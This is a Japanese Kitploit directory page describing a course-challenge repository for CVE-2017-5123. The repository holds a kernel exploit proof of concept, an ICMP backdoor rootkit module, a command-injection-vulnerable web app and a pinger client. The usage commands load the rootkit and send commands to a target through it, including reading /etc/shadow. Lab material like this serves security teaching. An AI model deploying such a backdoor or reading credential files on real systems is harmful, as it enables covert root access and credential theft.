Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cve-2017-5123 | Kitploit
ツール/GitHubGitHub/nabilboudra/cve-2017-5123
特権昇格エクスプロイトウェブアプリケーション悪用コマンド&コントロール学習と教育ペイロード開発バイナリエクスプロイトラボと実践
GitHubnabilboudra/cve-2017-5123

cve-2017-5123

リポジトリを見る
8ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2017-5123

このリポジトリには、CVE-2017-5123 のデモンストレーション、ICMPコマンド&コントロールバックドア、およびCWE-78(OSコマンドインジェクション)の脆弱なWebアプリケーションが含まれています。

CSC 4308 - チャレンジ3 の一部です。

前提条件

  • Linux Kernel: 4.13 から(4.13.7 を除く)まで
  • Node.js: 10.x
  • npm: 6.x

概要

このプロジェクトでは、3つの異なるセキュリティ研究コンポーネントを紹介しています:

1. CVE-2017-5123 カーネルエクスプロイト (lkm/rootkit.c)

Linuxカーネル4.13で導入された waitid システムコールの脆弱性に対する概念実証エクスプロイトです。この脆弱性により、権限昇格とサンドボックスエスケープが可能になります。

  • CVE ID: CVE-2017-5123
  • CWE ID: CWE-787 (範囲外書き込み)
  • 影響: ローカル権限昇格
  • エクスプロイト作者: Chris Salls (@chris_salls)

2. カーネルルートキット LKM (lkm/lkm.c)

ICMPエコー(ping)パケットを介して隠密なコマンド&コントロールチャネルを実装する悪意のあるLinuxカーネルモジュール(LKM)です。

  • CWE ID: CWE-912 (隠し機能)
  • 機能:
    • シーケンス番号 25678 のICMPエコー要求を傍受する
    • ICMPペイロードからシェルコマンドを抽出する
    • ルートとしてコマンドを実行する
    • ICMPエコー応答パケットを介してコマンド出力を返す

3. 脆弱なWebアプリケーション (vulnerable-app/)

OSコマンドインジェクションに対して脆弱なReact + Node.jsのファイル共有アプリケーションです。

  • CWE ID: CWE-78 (OSコマンドインジェクション)
  • 脆弱性: ファイルコンテンツフィールドでのシェルメタ文字インジェクション

4. ICMPデータピンガー (pinger/data-ping.c)

カーネルルートキットのバックドアと通信するために、カスタムペイロードを持つ細工されたICMPエコー要求を送信するユーティリティです。

使用方法

LKMのロード

カーネルモジュールのビルド

root@kitploit:~
cd lkm
make

カーネルモジュールのロード

root@kitploit:~
sudo insmod lkm.ko

ピンガークライアントのビルド

root@kitploit:~
cd ../pinger
gcc -o data-ping data-ping.c

ICMP経由でコマンドを送信

root@kitploit:~
# Must run as root to use raw sockets
sudo ./data-ping <target-ip> "whoami"
sudo ./data-ping localhost "ls -la /root"
sudo ./data-ping 192.168.1.100 "cat /etc/shadow"

モジュールのアンロード

root@kitploit:~
sudo rmmod lkm

クイックリロード

root@kitploit:~
make reload

脆弱なWebアプリケーションの実行

root@kitploit:~
# Build the frontend
cd vulnerable-app/frontend
npm run build

# Copy build to backend
cp -r build ../backend/

# Start the backend server (serves both API and frontend)
cd ../backend
npm start

アプリケーションは http://localhost:3001 で利用できます。

参考文献

  • CVE-2017-5123: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5123
  • CWE-78: https://cwe.mitre.org/data/definitions/78.html
  • CWE-787: https://cwe.mitre.org/data/definitions/787.html
  • CWE-912: https://cwe.mitre.org/data/definitions/912.html
  • Chris Sallsのオリジナルエクスプロイトコード: https://github.com/salls/kernel-exploits
ツールをダウンロード